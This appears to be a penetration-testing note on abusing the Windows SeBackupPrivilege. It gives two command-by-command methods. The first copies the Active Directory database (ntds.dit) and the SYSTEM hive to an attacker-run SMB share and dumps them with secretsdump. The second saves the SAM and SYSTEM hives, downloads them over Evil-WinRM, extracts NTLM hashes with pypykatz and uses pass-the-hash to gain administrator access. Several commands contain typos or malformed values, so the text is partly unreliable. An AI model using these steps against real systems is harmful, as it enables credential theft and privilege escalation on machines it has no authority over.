SeBackUp Privilege
SeBackupPrivilege allows you to access files that we wouldnt normally have.
Using robocopy we can copy files with the pretext of making backups.
We would have access to all the folders inside the administrator' desktop folder.
What could we do?
Well we can create a new directory in which we can just put sam, system and security files.
We then use smbserver from impacket to start our own smb server and run hte following commands.
echo "Y" | wbadmin start backup -backuptarget:\\<our-ip-share\<our-share> -include:c:\windows\ntds
wdadmin get version
The output will show a version identifier take a note of this
echo "Y" | wbadmin start recovery -version:07/16/2022-07:$3 -itemtype:file -items:C\windows\ntds\ntds.dit -recoverytarget:C:\ -norestoreacl
reg save HKLM\SYSTEM c:\system.hive
cp ntds.dit \\<our-smb-share>\<share>\ntds.dit
cp system.hive \\<our-smb-share>\<share>\system.hive
Then we travel to the location of the share
secretsdump.py -ntds ntds.dit -system system.hive LOCAL
Method 2
Exploiting Privilege on Windows 10
Now, we can start the exploitation of this privilege. As we discussed earlier that this privilege allows the user to read all the files in the system, we will use this to our advantage. To begin, we will traverse to the C:\ directory and then move to create a Temp directory. We can also traverse to a directory with the read and write privilege if the attacker is trying to be sneaky. Then we change the directory to Temp. Here we use our SeBackupPrivilege to read the SAM file and save a variant of it. Similarly, we read the SYSTEM file and save a variant of it.
cd c:\mkdir Temp
reg save hklm\sam c:\Temp\sam
reg save hklm\system c:\Temp\system
This means that now our Temp Directory must have a SAM file and a SYSTEM file. Now using the Evil-WinRM download command, we transfer the file from the Temp directory on the target machine to our Kali Linux Machine.
cd Temp
download sam
download system
Now, we can extract the hive secrets from the SAM and SYSTEM file using the pypykatz. If not present on your Kali Linux, you can download it from its GitHub. It is a variant of Mimikatz cooked in Python. So, we can run its registry function and then use the –sam parameter to provide the path to the SAM and SYSTEM files. As soon as the command run, we can see in the demonstration below that we have successfully extracted the NTLM hashes of the Administrator account and other users as well.
pypykatz registry --sam sam system
Now, we can use the NTLM Hash of the raj user to get access to the target machine as a raj user. We again used Evil-WinRM to do this. After connecting to the target machine, we run net user to see that raj user is a part of the Administrator group. This means we have successfully elevated privilege over our initial shell as the aarti user.
Last updated
